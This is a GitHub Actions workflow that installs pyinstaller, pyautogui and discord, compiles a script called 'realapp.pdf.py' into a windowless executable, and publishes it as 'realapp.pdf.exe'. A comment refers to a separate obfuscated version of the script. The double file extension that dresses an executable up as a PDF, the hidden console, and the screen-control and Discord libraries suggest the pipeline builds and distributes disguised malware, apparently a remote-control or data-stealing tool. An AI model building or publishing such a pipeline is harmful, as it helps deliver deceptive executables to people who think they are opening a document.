name: Build and Release

on:
  push:
    branches:
      - main

jobs:
  build:
    runs-on: windows-latest

    steps:
      - name: Checkout code
        uses: actions/checkout@v2

      - name: Install dependencies
        run: |
          python -m pip install --upgrade pip
          pip install pyinstaller
          pip install pyautogui discord

      - name: Build executable
        run: |
          pyinstaller --onefile --noconsole realapp.pdf.py  # Build from the non-obfuscated script

      - name: Create Release
        uses: softprops/action-gh-release@v1
        with:
          tag_name: latest
          release_name: latest
          files: dist/realapp.pdf.exe  # Adjust output file name if necessary
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
